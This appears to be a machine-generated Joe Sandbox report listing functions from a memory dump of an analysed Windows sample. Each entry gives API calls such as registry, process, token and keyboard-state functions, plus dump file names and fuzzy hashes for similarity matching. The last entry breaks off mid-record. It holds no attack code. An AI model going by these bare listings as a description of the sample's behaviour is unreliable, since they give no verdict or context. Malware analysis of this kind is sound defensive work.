                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper
                                                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                          • API String ID: 3964851224-769500911
                                                                                                          • Opcode ID: ec5162386422503feeee5b07ed27c8973565b85be179fa2cbab32011c67444df
                                                                                                          • Instruction ID: f86a7561e01d78ecc69e66861badabdac2d85097e8c8150a1d1c25d8298f75f3
                                                                                                          • Opcode Fuzzy Hash: ec5162386422503feeee5b07ed27c8973565b85be179fa2cbab32011c67444df
                                                                                                          • Instruction Fuzzy Hash: 97115A3094012D9B8F00EFA4D8515FEB3B4FF5A344B6065A9D910B7252EB326E0ACB40
                                                                                                          Function 00EBF23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EBF2F0
                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EBF320
                                                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EBF453
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00EBF4D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2364364464-0
                                                                                                          • Opcode ID: ad27f4fba61476c0944a67aad5be4701f2444b6de953881d2beb393ebc68ced6
                                                                                                          • Instruction ID: 2ac2a590b4b809635bbdc6a41861d9a7cd4ab2393f915db6ae22600c55ab2742
                                                                                                          • Opcode Fuzzy Hash: ad27f4fba61476c0944a67aad5be4701f2444b6de953881d2beb393ebc68ced6
                                                                                                          • Instruction Fuzzy Hash: 5D816FB16003009FD720EF28EC46F6BB7E5AF44714F14991DF999AB2D2D7B0AC408B51
                                                                                                          Function 00EC0697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00EC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EC040D,?,?), ref: 00EC1491
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EC075D
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EC079C
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EC07E3
                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00EC080F
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EC081C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 3440857362-0
                                                                                                          • Opcode ID: 64ca10ccdd23146a087ab11f91919be4007c8f8d35ced02adbbe3aa60cce98b2
                                                                                                          • Instruction ID: d8bc4c5f3853d346f9f48b25701ecea6940d116129dd7e84d427927720f0ffe8
                                                                                                          • Opcode Fuzzy Hash: 64ca10ccdd23146a087ab11f91919be4007c8f8d35ced02adbbe3aa60cce98b2
                                                                                                          • Instruction Fuzzy Hash: 7B515C71208204AFD704EF64C981F6AB7E9FF84704F04991EF995A72A2DB31E909CB52
                                                                                                          Function 00EAEBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EAEC62
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EAEC8B
                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EAECCA
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EAECEF
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EAECF7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1389676194-0
                                                                                                          • Opcode ID: 93bfb51959d6e834bfa0ebe2842e304077e6c56ecc197b2dd0dd33b3050b74ff
                                                                                                          • Instruction ID: f87307a7826cdaea382a5272b2e4323d1c7b21219903d69b414277c25aee5bdb
                                                                                                          • Opcode Fuzzy Hash: 93bfb51959d6e834bfa0ebe2842e304077e6c56ecc197b2dd0dd33b3050b74ff
                                                                                                          • Instruction Fuzzy Hash: B6514875A00105DFCB01EF64D985AAEBBF5EF09314B188499E809BB3A2CB31ED41CB60
                                                                                                          Function 00ECA67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 11f3f02f5531a5df98f2154b1261ca0515ed3f48749cee3b872d16b8b85bd463
                                                                                                          • Instruction ID: c4ed54c079a542d6a2732314536ed69b455b72e2ab785c08641ac5c9f89af768
                                                                                                          • Opcode Fuzzy Hash: 11f3f02f5531a5df98f2154b1261ca0515ed3f48749cee3b872d16b8b85bd463
                                                                                                          • Instruction Fuzzy Hash: 9941E135900108AFD710DB28DE88FA9BBB9FB09318F1C127AF916B72D1C671AD42DA51
                                                                                                          Function 00E42714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 00E42727
                                                                                                          • ScreenToClient.USER32(00F077B0,?), ref: 00E42744
                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00E42769
                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 00E42777
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 4210589936-0
                                                                                                          • Opcode ID: 4d26b6b3b8e85deb934a89c14d411816c2e49f8e522d74c6fc15481f4a4e3eea
                                                                                                          • Instruction ID: 1be9a797c61df3f1eb489d6f43ec43c6e671d7a74ea0d8a3f8814db5a11af0a2
                                                                                                          • Opcode Fuzzy Hash: 4d26b6b3b8e85deb934a89c14d411816c2e49f8e522d74c6fc15481f4a4e3eea
                                                                                                          • Instruction Fuzzy Hash: 73416E35504209FFDF159F68D848AE9BBB4FB05328F60935EF928B2290C731AD54DB91
                                                                                                          Function 00E995D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E995E8
                                                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00E99692
                                                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E9969A
                                                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00E996A8
                                                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E996B0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3382505437-0
                                                                                                          • Opcode ID: 7c83f1767ed46546e5e73dcc2c01a58a6af1b8bebbb6a9f5e3b681d5f6e872cc
                                                                                                          • Instruction ID: 83894c1a7e1a7548ac1ac757c999067fff61b7389cefff555280c617bfad2524
                                                                                                          • Opcode Fuzzy Hash: 7c83f1767ed46546e5e73dcc2c01a58a6af1b8bebbb6a9f5e3b681d5f6e872cc
                                                                                                          • Instruction Fuzzy Hash: 7731BA71900219EFDF14CF6DE94CB9E3BB5EB44319F104229F925AA2D2C3B09924DB91
                                                                                                          Function 00ECB7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ECB804
                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00ECB829
                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00ECB841
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00ECB86A
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EB155C,00000000), ref: 00ECB888
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 2294984445-0
                                                                                                          • Opcode ID: 84e3300496c4ce68ca84060f100f1c04fd50cb196d9bfbe2774b5596fa6a7a61
                                                                                                          • Instruction ID: 43af9e3e783a705808363f643c13350a80621c4d5fde6f390e662d1d95c36a09
                                                                                                          • Opcode Fuzzy Hash: 84e3300496c4ce68ca84060f100f1c04fd50cb196d9bfbe2774b5596fa6a7a61
                                                                                                          • Instruction Fuzzy Hash: 4E219F32914215AFCB289F399D09F6A3BA8FB05724F25572DFD21E72E0D7319811DB90
                                                                                                          Function 00EB6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsWindow.USER32(00000000), ref: 00EB6159
                                                                                                          • GetForegroundWindow.USER32 ref: 00EB6170
                                                                                                          • GetDC.USER32(00000000), ref: 00EB61AC
                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00EB61B8
                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00EB61F3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 4156661090-0
                                                                                                          • Opcode ID: ac020b9fbc4cc327c9ada451a673bea8045579dbf5f82dddbacfdf391ab4d546
                                                                                                          • Instruction ID: c374a041b0609ae42433690176a62f1eea7632ea4db3ca303f8cd4ddab276923
                                                                                                          • Opcode Fuzzy Hash: ac020b9fbc4cc327c9ada451a673bea8045579dbf5f82dddbacfdf391ab4d546
                                                                                                          • Instruction Fuzzy Hash: B8219675A012049FD714EF69DD84BAAB7F9EF49310F048479F95AA7352CA30ED04CB90
                                                                                                          Function 00E416CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E41729
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00E41738
                                                                                                          • BeginPath.GDI32(?), ref: 00E4174F
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00E41778
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                          • String ID:
                                                                                                          • API String ID: 3225163088-0
                                                                                                          • Opcode ID: d8565bc5c0db6ea8a2be418e020f5d2127199cfe600638e39fe2038048375c7d
                                                                                                          • Instruction ID: 5f73e1c25e59d1300dea0b63322d48e38f229d5da670e596bf0f74cd14e2a55f
                                                                                                          • Opcode Fuzzy Hash: d8565bc5c0db6ea8a2be418e020f5d2127199cfe600638e39fe2038048375c7d
                                                                                                          • Instruction Fuzzy Hash: 0C216D30905308EFDB10AF25ED4CBAA7BE9FB01325F2482D6F815B61A0D771A995DB90
                                                                                                          Function 00E9C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 2931989736-0
                                                                                                          • Opcode ID: 356dfcc1e70c18a63fc213bf13178f9d01823718756e66480f21b2a1d02b6854
                                                                                                          • Instruction ID: 13229d43a2c777fc69266834891d3d1b1f4a4e07ee2e8ad00585fec46d6c07b9
                                                                                                          • Opcode Fuzzy Hash: 356dfcc1e70c18a63fc213bf13178f9d01823718756e66480f21b2a1d02b6854
                                                                                                          • Instruction Fuzzy Hash: E601B9626402057BDA287521AD42FFF735CDA603C4F186166FE06B6741E790FE1182E1
                                                                                                          Function 00EA504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00EA5075
                                                                                                          • __beginthreadex.LIBCMT ref: 00EA5093
                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00EA50A8
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EA50BE
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EA50C5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                          • String ID:
                                                                                                          • API String ID: 3824534824-0
                                                                                                          • Opcode ID: 514ecbf192a7fbede6a301fe1c1636785a5b19414a03369628e5c2c427ce8134
                                                                                                          • Instruction ID: c4d47d34796c3d4b5d93651a59790c027b1e64a6e44340c51b25b9df2c9b94af
                                                                                                          • Opcode Fuzzy Hash: 514ecbf192a7fbede6a301fe1c1636785a5b19414a03369628e5c2c427ce8134
                                                                                                          • Instruction Fuzzy Hash: 54110873D09718BFC7019BA9AC44A9B7FACEB4A320F140296F814E7390D67199048BF1
                                                                                                          Function 00E98E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E98E3C
                                                                                                          • GetLastError.KERNEL32(?,00E98900,?,?,?), ref: 00E98E46
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00E98900,?,?,?), ref: 00E98E55
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00E98900,?,?,?), ref: 00E98E5C
                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E98E73
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 842720411-0
                                                                                                          • Opcode ID: 9d27f641ca384c609bcbab66331117cff4b351758137abcbd8722b8a3b676d69
                                                                                                          • Instruction ID: fbf886e8448a50693812a5712ccb80d1eef00cf9debea501a914e3f0fb376edc
                                                                                                          • Opcode Fuzzy Hash: 9d27f641ca384c609bcbab66331117cff4b351758137abcbd8722b8a3b676d69
                                                                                                          • Instruction Fuzzy Hash: 88013671602204BFDF114FA6ED58EAB7FADEF86755B14056AF845E2120DB31DC14CA60
                                                                                                          Function 00EA57FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EA581B
                                                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EA5829
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EA5831
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EA583B
                                                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EA5877
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                          • String ID:
                                                                                                          • API String ID: 2833360925-0
                                                                                                          • Opcode ID: d97a4dc3d53adc5bdadeea31ef897d5cb45816414662cb497d31aafea2883462
                                                                                                          • Instruction ID: 0bfb81a996d18b966817ddf9d31787dc375d989834fc5a9810998b763bf4925b
                                                                                                          • Opcode Fuzzy Hash: d97a4dc3d53adc5bdadeea31ef897d5cb45816414662cb497d31aafea2883462
                                                                                                          • Instruction Fuzzy Hash: A2018032C02A2DDBCF089FE5EC49AEDBBB8FB0D711F00456AE401B6140CB34A554CBA1
                                                                                                          Function 00E98CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E98CDE
                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E98CE8
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E98CF7
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E98CFE
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E98D14
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 44706859-0
                                                                                                          • Opcode ID: 45c267c0f1260d722e649083204359922d92376ee50a6f93891ffc114116a3f4
